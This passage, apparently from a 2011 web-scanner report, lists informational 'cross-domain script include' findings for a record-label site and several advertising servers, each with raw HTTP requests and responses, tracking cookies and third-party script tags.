jErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjm2oawXHqkUpttbu+TpTQ7/r5k2TkfGHxsBiWalfeAB/i2ZeDVh3sNrEwwJAMx4il/KokORw7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENGDz17XkpjDubHWNj6MzdO20TKeo2ebTm+X/aIFIAjSHwRm25h7faDJboBly37SaRVTJmVSVncsdODBYijyuPYTdFwC03sgxGgMINUQBU941lqVIMhGuSaJnSZ1bjvqoCCRDLRyqJCi6WnVSUpydvqvGWVlBYhxf+2EJFBlcMlHTpZKXGT1HeSqJJiOoXZpr/uvbpKdN1F5nqoIZKyR9HZy2TbKbYnBNFxzgutHbw6zXXppgfBJaWgOtCOMhs/ZZJ3OA1pxSjhPMmisV+EotP7wA2c0D7Io2lBYNXPe+9NRjvYmJrWaYkh2V9cxr+G5/xpyO81WenMWdhNnGRMtQomwCOTzjyZJYxNaLgOUEIIKY/A87ufnJ5qjqqB+BP8joxvEdW3W1Npu2B+Na3ecvL1Hhc5ZC1GBTQF0B1zfcmgxi8UCiZBmR2u4TvNpihWJeHOeADYhYgHy7fOE602RwkvfJpCdu7CgEkl/EapX90ymBIYIqwTRnrIV8fRqLA/JDPUN6wj4Po1l5cmK4VoP0sL52LnFEkGOXjlWFKb/dz4QQVlB3RU1uDB5Q2eyVzyWDhLN6+otEMWxip/DPpeVZFX20gRQOs9ik/EEMEZ5SBlEKXm9E12aY3Lb8xP23GKX6t28Fv8oVf0A9Hzq3RgaRIvYuSeHKg9n7kgHYmsqEC5FNeGc7ov2Rk7IAiVAilbtLgqkH3JaN/btEetkR3e86wQSucxk5aStmOWDZrorIifNpOczosSxBSP3da2SvQWkfJfNRVfxtlhd7qB8LBiXDl2SUm9TMHyJ+KLZ20a5mxC8xN7Om6Kt5yd5T28UAIR5tZznNV/NkyVtt/ytpEiB8NmrJm1LxAnC+RcrDEAr8/agqLZBIx3GTt7wIpqdhFr58Dzg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages"><'+'/script>
...[SNIP]...
16.4. http://asthmatickitty.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://www.sufjan.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 39321


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Asthmatic Kitty Records : Home</title>
<script src="/mint/?js" type="text/javascript"></script>

<script language
...[SNIP]...
<meta http-equiv="Cache-Control" content="no-cache" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...
16.5. http://asthmatickitty.com/news.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asthmatickitty.com
Path:   /news.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news.php HTTP/1.1
Host: asthmatickitty.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MintAcceptsCookies=1; __utmz=1.1304949953.1.1.utmcsr=sufjan.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.851040495.1304949953.1304949953.1304949953.1; __utmc=1; __utmb=1.1.10.1304949953; MintUnique=1; MintUniqueHour=1304949600; MintUniqueDay=1304917200; MintUniqueWeek=1304830800; MintUniqueMonth=1304226000; MintUniqueLocation=1; MintCrush=-409446192

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Content-Type: text/html
Content-Length: 147990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Asthmatic Kitty Records</title>
<script src="/mint/?js" type="text/javascript"></script>
<script language="JavaScr
...[SNIP]...
<meta http-equiv="Cache-Control" content="no-cache" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script>
<script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...
16.6. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCm55_uBBCm55_uBBgB

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>
16.7. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAgMCAAUAAAAAOCNlQgAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949676%29%3Buf%28%27r%27%2C+184995%2C+1304949676%29%3B&cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; sess=1; uuid2=2724386019227846218; icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgCIAIoAjC055_uBBC055_uBBgC

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(; path=/; expires=Sun, 07-Aug-2011 14:01:25 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 09 May 2011 14:01:25 GMT
Content-Length: 530

<script language="JavaScript" src="http://mf.sitescout.com/tag.jsp?pid=0C66F16&w=728&h=90&rnd=1304949683&cm=http://ib.adnxs.com/click/XHLcKR2syT9cctwpHazJPwAAACAEVvI_XHLcKR2syT9cctwpHazJP0YIgIiop3FfSsYda6b2ziWz88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAmA8AAQMCAAUAAAAANyNUQgAAAAA./cnd=!Wx_b0wjC6AIQo6ULGAAg8dUBKAAxXXLcKR2syT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-ELG5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc="></script>
16.8. http://media.adfrontiers.com/pq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pq?t=f&s=923&ts=1304949604772&cm=1148&ac=5&at=1&xvk=60302672.07185271&fd=t&tc=1&rr=t HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949604776|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: text/html
Content-Length: 771
Date: Mon, 09 May 2011 14:00:09 GMT
Connection: close

<html><head>
<title>Adv.com 2010 - FCap 3/24 728x90</title>
</head><body marginwidth=0 marginheight=0 leftmargin=0 topmargin=0 style="background-color:transparent">
<script type='text/javascript'>
v
...[SNIP]...
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
16.9. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

Issue detail

The response dynamically includes the following script from another domain:

Request

